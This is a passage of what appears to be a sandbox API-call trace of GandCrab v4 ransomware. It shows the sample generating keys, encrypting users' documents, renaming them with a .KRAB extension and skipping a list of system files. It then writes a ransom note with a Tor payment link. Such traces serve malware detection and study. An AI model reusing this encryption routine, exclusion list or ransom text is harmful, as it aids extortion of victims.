"c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\fkt56s2wxzz0frw6e.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\FKT56s2wxZz0FRw6E.docx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\fkt56s2wxzz0frw6e.docx.krab")) returned 1 [0088.973] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.973] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0088.973] lstrcmpW (lpString1="kFh-nl5l0.xls", lpString2=".") returned 1 [0088.973] lstrcmpW (lpString1="kFh-nl5l0.xls", lpString2="..") returned 1 [0088.973] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\", lpString2="kFh-nl5l0.xls" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\kFh-nl5l0.xls") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\kFh-nl5l0.xls" [0088.973] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.973] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\kFh-nl5l0.xls.KRAB") returned 71 [0088.973] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\kFh-nl5l0.xls") returned 66 [0088.974] lstrlenW (lpString=".xls") returned 4 [0088.974] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.974] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".xls ") returned 5 [0088.974] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.974] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\kFh-nl5l0.xls") returned 66 [0088.974] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\kFh-nl5l0.xls") returned 66 [0088.974] lstrcmpiW (lpString1="kFh-nl5l0.xls", lpString2="desktop.ini") returned 1 [0088.974] lstrcmpiW (lpString1="kFh-nl5l0.xls", lpString2="autorun.inf") returned 1 [0088.974] lstrcmpiW (lpString1="kFh-nl5l0.xls", lpString2="ntuser.dat") returned -1 [0088.974] lstrcmpiW (lpString1="kFh-nl5l0.xls", lpString2="iconcache.db") returned 1 [0088.974] lstrcmpiW (lpString1="kFh-nl5l0.xls", lpString2="bootsect.bak") returned 1 [0088.975] lstrcmpiW (lpString1="kFh-nl5l0.xls", lpString2="boot.ini") returned 1 [0088.975] lstrcmpiW (lpString1="kFh-nl5l0.xls", lpString2="ntuser.dat.log") returned -1 [0088.975] lstrcmpiW (lpString1="kFh-nl5l0.xls", lpString2="thumbs.db") returned -1 [0088.975] lstrcmpiW (lpString1="kFh-nl5l0.xls", lpString2="KRAB-DECRYPT.html") returned -1 [0088.975] lstrcmpiW (lpString1="kFh-nl5l0.xls", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.975] lstrcmpiW (lpString1="kFh-nl5l0.xls", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.975] lstrcmpiW (lpString1="kFh-nl5l0.xls", lpString2="ntldr") returned -1 [0088.975] lstrcmpiW (lpString1="kFh-nl5l0.xls", lpString2="NTDETECT.COM") returned -1 [0088.975] lstrcmpiW (lpString1="kFh-nl5l0.xls", lpString2="Bootfont.bin") returned 1 [0088.975] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.975] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x10108a8) returned 1 [0088.977] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.977] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.977] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.977] CryptGenRandom (in: hProv=0x10108a8, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0088.977] CryptReleaseContext (hProv=0x10108a8, dwFlags=0x0) returned 1 [0088.978] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.978] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010ce8) returned 1 [0088.979] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.980] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.980] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.980] CryptGenRandom (in: hProv=0x1010ce8, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0088.980] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0088.980] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.980] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10113d0) returned 1 [0088.982] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x10234f8) returned 1 [0088.982] CryptGetKeyParam (in: hKey=0x10234f8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0088.982] CryptEncrypt (in: hKey=0x10234f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0088.982] GetLastError () returned 0x0 [0088.982] CryptDestroyKey (hKey=0x10234f8) returned 1 [0088.982] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0088.983] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011898) returned 1 [0088.989] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x10230f8) returned 1 [0088.989] CryptGetKeyParam (in: hKey=0x10230f8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0088.989] CryptEncrypt (in: hKey=0x10230f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0088.989] GetLastError () returned 0x0 [0088.989] CryptDestroyKey (hKey=0x10230f8) returned 1 [0088.989] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0088.989] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\kFh-nl5l0.xls" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\kfh-nl5l0.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0088.990] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0088.990] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0088.990] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x2287, lpOverlapped=0x0) returned 1 [0089.004] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffffdd79, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.004] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x2287, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x2287, lpOverlapped=0x0) returned 1 [0089.004] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0089.005] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.008] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.009] CloseHandle (hObject=0x3a8) returned 1 [0089.009] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.009] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\kFh-nl5l0.xls" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\kfh-nl5l0.xls"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\kFh-nl5l0.xls.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\kfh-nl5l0.xls.krab")) returned 1 [0089.010] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.010] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0089.010] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0089.010] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0089.011] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\KRAB-DECRYPT.txt" [0089.011] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.011] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\KRAB-DECRYPT.txt.KRAB") returned 74 [0089.011] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\KRAB-DECRYPT.txt") returned 69 [0089.011] lstrlenW (lpString=".txt") returned 4 [0089.011] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.011] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0089.011] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.012] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\KRAB-DECRYPT.txt") returned 69 [0089.012] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\KRAB-DECRYPT.txt") returned 69 [0089.012] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0089.012] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0089.012] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0089.012] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0089.012] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0089.012] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0089.012] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0089.012] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0089.012] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0089.012] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0089.012] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.012] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0089.013] lstrcmpW (lpString1="luxTehEGnFI6C5KeN.docx", lpString2=".") returned 1 [0089.013] lstrcmpW (lpString1="luxTehEGnFI6C5KeN.docx", lpString2="..") returned 1 [0089.013] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\", lpString2="luxTehEGnFI6C5KeN.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\luxTehEGnFI6C5KeN.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\luxTehEGnFI6C5KeN.docx" [0089.013] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.013] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\luxTehEGnFI6C5KeN.docx.KRAB") returned 80 [0089.013] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\luxTehEGnFI6C5KeN.docx") returned 75 [0089.013] lstrlenW (lpString=".docx") returned 5 [0089.013] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.013] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".docx ") returned 6 [0089.013] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.014] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\luxTehEGnFI6C5KeN.docx") returned 75 [0089.014] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\luxTehEGnFI6C5KeN.docx") returned 75 [0089.014] lstrcmpiW (lpString1="luxTehEGnFI6C5KeN.docx", lpString2="desktop.ini") returned 1 [0089.014] lstrcmpiW (lpString1="luxTehEGnFI6C5KeN.docx", lpString2="autorun.inf") returned 1 [0089.014] lstrcmpiW (lpString1="luxTehEGnFI6C5KeN.docx", lpString2="ntuser.dat") returned -1 [0089.014] lstrcmpiW (lpString1="luxTehEGnFI6C5KeN.docx", lpString2="iconcache.db") returned 1 [0089.014] lstrcmpiW (lpString1="luxTehEGnFI6C5KeN.docx", lpString2="bootsect.bak") returned 1 [0089.014] lstrcmpiW (lpString1="luxTehEGnFI6C5KeN.docx", lpString2="boot.ini") returned 1 [0089.014] lstrcmpiW (lpString1="luxTehEGnFI6C5KeN.docx", lpString2="ntuser.dat.log") returned -1 [0089.014] lstrcmpiW (lpString1="luxTehEGnFI6C5KeN.docx", lpString2="thumbs.db") returned -1 [0089.014] lstrcmpiW (lpString1="luxTehEGnFI6C5KeN.docx", lpString2="KRAB-DECRYPT.html") returned 1 [0089.014] lstrcmpiW (lpString1="luxTehEGnFI6C5KeN.docx", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.014] lstrcmpiW (lpString1="luxTehEGnFI6C5KeN.docx", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.014] lstrcmpiW (lpString1="luxTehEGnFI6C5KeN.docx", lpString2="ntldr") returned -1 [0089.014] lstrcmpiW (lpString1="luxTehEGnFI6C5KeN.docx", lpString2="NTDETECT.COM") returned -1 [0089.014] lstrcmpiW (lpString1="luxTehEGnFI6C5KeN.docx", lpString2="Bootfont.bin") returned 1 [0089.014] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.015] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x10108a8) returned 1 [0089.017] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0089.017] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.018] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.018] CryptGenRandom (in: hProv=0x10108a8, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0089.018] CryptReleaseContext (hProv=0x10108a8, dwFlags=0x0) returned 1 [0089.018] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.018] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011458) returned 1 [0089.019] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0089.020] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.020] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.020] CryptGenRandom (in: hProv=0x1011458, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0089.020] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0089.020] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.021] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011898) returned 1 [0089.022] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x10230f8) returned 1 [0089.022] CryptGetKeyParam (in: hKey=0x10230f8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0089.022] CryptEncrypt (in: hKey=0x10230f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0089.022] GetLastError () returned 0x0 [0089.023] CryptDestroyKey (hKey=0x10230f8) returned 1 [0089.023] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0089.023] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0089.024] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x1023138) returned 1 [0089.024] CryptGetKeyParam (in: hKey=0x1023138, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0089.024] CryptEncrypt (in: hKey=0x1023138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0089.025] GetLastError () returned 0x0 [0089.025] CryptDestroyKey (hKey=0x1023138) returned 1 [0089.025] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0089.025] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\luxTehEGnFI6C5KeN.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\luxtehegnfi6c5ken.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0089.025] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0089.025] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0089.026] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0xc71c, lpOverlapped=0x0) returned 1 [0089.064] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffff38e4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.064] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xc71c, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0xc71c, lpOverlapped=0x0) returned 1 [0089.064] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0089.064] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.068] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.069] CloseHandle (hObject=0x3a8) returned 1 [0089.069] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.069] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\luxTehEGnFI6C5KeN.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\luxtehegnfi6c5ken.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\luxTehEGnFI6C5KeN.docx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\luxtehegnfi6c5ken.docx.krab")) returned 1 [0089.070] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.071] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0089.071] lstrcmpW (lpString1="x5rBOxA2", lpString2=".") returned 1 [0089.071] lstrcmpW (lpString1="x5rBOxA2", lpString2="..") returned 1 [0089.071] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\", lpString2="x5rBOxA2" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2" [0089.071] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\" [0089.071] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0089.071] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0089.071] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0089.071] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0089.071] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0089.071] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.072] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.072] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\\\KRAB-DECRYPT.txt") returned 79 [0089.072] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0089.073] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB 